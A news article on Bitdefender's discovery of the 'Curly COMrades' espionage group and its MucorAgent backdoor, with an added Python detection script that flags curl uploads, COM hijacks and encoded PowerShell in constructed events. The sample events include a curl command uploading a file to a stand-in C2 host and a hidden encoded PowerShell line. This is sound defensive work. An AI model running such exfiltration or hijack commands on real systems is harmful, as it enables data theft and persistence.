- Bitdefender finds new malware in the wild
- The company attributes it to a brand-new cyber-espionage group
- Researchers believe the group is Russian
Bitdefender cybersecurity researchers recently spotted a new threat actor using previously unseen malware to target critical infrastructure organizations in Eastern Europe.
Bitdefender has named the new group Curly COMrades because it relies heavily on the curl.exe tool to exfiltrate data and communicate with its C2 server, and because it hijacks Component Object Model (COM) objects during its attacks.
In its attacks, Curly COMrades deploys a backdoor named MucorAgent, a custom three-stage malware component “designed as a stealthy .NET tool capable of executing an AES-encrypted PowerShell script and uploading the resulting output to a designated server.”
When in doubt, blame the Russians
In other words, it is a piece of Windows malware that runs hidden commands, keeps them encrypted to evade detection, and returns the results to the attacker.
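The three behaviours described above (curl.exe used for uploads and C2 traffic, COM object hijacking via user-hive registry writes, and encrypted or encoded PowerShell launched by a non-interactive parent) each leave a footprint in endpoint telemetry. The following triage script is an added example, not Bitdefender's code or anything from its report: it runs simple detection rules over a handful of constructed Sysmon-style events. The host names, file paths, CLSID and SID in the sample events are hypothetical, and the allowlist of legitimate download hosts is an assumption a real deployment would replace with its own.

```python
"""Triage constructed Sysmon-style events for the tradecraft described in the article:
curl.exe uploads to unknown hosts, user-hive COM InprocServer32 hijacks, and
encoded/encrypted PowerShell. All events below are constructed samples."""
import ntpath
import re

# Constructed sample telemetry (hypothetical paths, hosts, SID and CLSID).
SAMPLE_EVENTS = [
    {"type": "process",
     "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"curl.exe -s -T C:\Users\Public\out.bin https://update.example-c2.test/u"},
    {"type": "process",  # benign download by an admin at a console
     "image": r"C:\tools\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "curl.exe -sS -o patch.zip https://downloads.vendor.example/patch.zip"},
    {"type": "registry", "event": "SetValue",  # HKCU shadowing of a COM class
     "target": r"HKU\S-1-5-21-1111\Software\Classes\CLSID\{00000000-0000-0000-0000-00000000AAAA}\InprocServer32\(Default)",
     "details": r"C:\Users\Public\Libraries\helper.dll"},
    {"type": "registry", "event": "SetValue",  # machine-wide vendor registration
     "target": r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\(Default)",
     "details": r"C:\Program Files\Vendor\vendor.dll"},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\dllhost.exe",
     "cmdline": "powershell.exe -NoP -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

# curl switches that send data rather than fetch it.
UPLOAD_FLAGS = re.compile(r"(?:^|\s)(?:-T|--upload-file|-d|--data(?:-binary|-raw)?|-F|--form|-X\s+POST)\b")
URL_RE = re.compile(r"https?://([^/\s:]+)", re.I)
ALLOWED_HOSTS = {"downloads.vendor.example"}  # assumed allowlist, replace with your own

# COM registration under a user hive; HKCU entries shadow HKLM for that user.
COM_INPROC = re.compile(
    r"^HK(?:U|CU)\\.*\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]{36}\}\\InprocServer32", re.I)
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

PS_ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+\S", re.I)
PS_CRYPTO = re.compile(r"FromBase64String|AesCryptoServiceProvider|Security\.Cryptography\.Aes", re.I)


def _exe(path):
    return ntpath.basename(path).lower()


def curl_exfil_alert(ev):
    """Flag curl.exe sending data to a host that is not on the allowlist."""
    if ev.get("type") != "process" or _exe(ev["image"]) != "curl.exe":
        return None
    cmd = ev["cmdline"]
    if not UPLOAD_FLAGS.search(cmd):
        return None
    m = URL_RE.search(cmd)
    host = m.group(1).lower() if m else "<no-url>"
    if host in ALLOWED_HOSTS:
        return None
    return f"curl upload to {host} (parent {_exe(ev['parent'])})"


def com_hijack_alert(ev):
    """Flag a user-hive CLSID InprocServer32 value pointing at a DLL outside trusted dirs."""
    if ev.get("type") != "registry" or ev.get("event") != "SetValue":
        return None
    if not COM_INPROC.match(ev["target"]):
        return None
    dll = ev.get("details", "").lower()
    if dll.startswith(TRUSTED_DLL_DIRS):
        return None  # still worth logging at low priority in practice
    return f"user-hive COM InprocServer32 points to {dll}"


def encrypted_ps_alert(ev):
    """Flag encoded-command or in-line AES/Base64 PowerShell invocations."""
    if ev.get("type") != "process" or _exe(ev["image"]) != "powershell.exe":
        return None
    cmd = ev["cmdline"]
    if PS_ENCODED.search(cmd) or PS_CRYPTO.search(cmd):
        return f"encoded/encrypted PowerShell launched by {_exe(ev['parent'])}"
    return None


RULES = (curl_exfil_alert, com_hijack_alert, encrypted_ps_alert)


def triage(events):
    """Return (rule_name, message) pairs for every event that trips a rule."""
    alerts = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                alerts.append((rule.__name__, msg))
    return alerts


if __name__ == "__main__":
    for name, msg in triage(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

Each rule on its own is noisy (administrators do use curl, and vendors do register COM servers), which is why the script keys on the combination the article describes: upload switches to an unknown host, a CLSID registered under a user hive rather than HKLM, and an encoded script spawned by a process that normally never launches PowerShell.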
So far, identified victims include government and judicial organizations in Georgia and energy companies in Moldova.
Given the targets, the researchers believe the attackers are Russian, or at least Russia-aligned.
However, they noted that there are no strong ties to known Russian APT groups, although Curly COMrades' operations “align with the geopolitical objectives of the Russian Federation”.
Bitdefender was also unable to determine the initial access vector, that is, how the attackers infiltrated the targeted endpoints to deploy the malware in the first place.
They say they observed the installation of multiple proxy tools, including Resocks, which they believe may have been used for this purpose.
Since Russia's attention turned to Ukraine in 2014 with the annexation of Crimea, the countries on its eastern border have slipped out of the spotlight. Georgia, however, is in a position similar to Ukraine's, with two regions, South Ossetia and Abkhazia, having declared independence with the help of the Russian army. It would therefore be logical for Russian cyber operators to want to keep an eye on neighboring countries and their diplomatic efforts.
Via BleepingComputer